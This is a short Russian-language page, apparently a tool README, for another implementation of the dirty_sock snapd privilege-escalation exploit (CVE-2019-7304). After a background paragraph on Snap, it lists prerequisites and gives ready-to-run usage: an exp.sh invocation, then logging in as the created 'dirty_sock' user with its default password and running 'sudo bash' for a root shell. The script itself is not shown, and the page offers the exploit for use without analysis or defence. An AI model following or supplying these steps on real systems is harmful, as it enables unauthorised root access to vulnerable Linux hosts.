
Ещё одна реализация эксплойта для повышения привилегий в Linux через snap(d) (CVE-2019-7304)
Ещё одна реализация эксплойта для повышения привилегий в Linux через snap(d) (CVE-2019-7304)
Snap — это система упаковки и развёртывания программного обеспечения, разработанная Canonical для операционных систем, использующих ядро Linux. Пакеты, называемые snaps, и инструмент для работы с ними, snapd, работают в различных дистрибутивах Linux и позволяют вышестоящим разработчикам программного обеспечения распространять свои приложения напрямую пользователям. Snaps — это самодостаточные приложения, работающие в песочнице с опосредованным доступом к хост-системе. Изначально Snap был выпущен для облачных приложений[1], но позже был портирован для работы с устройствами Интернета вещей[3][4] и десктопными[5][6] приложениями тоже.
dirty_sock: повышение привилегий в Linux (через snapd)
- snap установлен в системе
- у вас есть sudo для snap с паролем или без пароля
./exp.sh "snap_path" "pwd"
ex:
./exp.sh "/usr/bin/snap" "/home/evil"
затем вы можете использовать:
su - dirty_sock
dirty_sock (as password)
sudo bash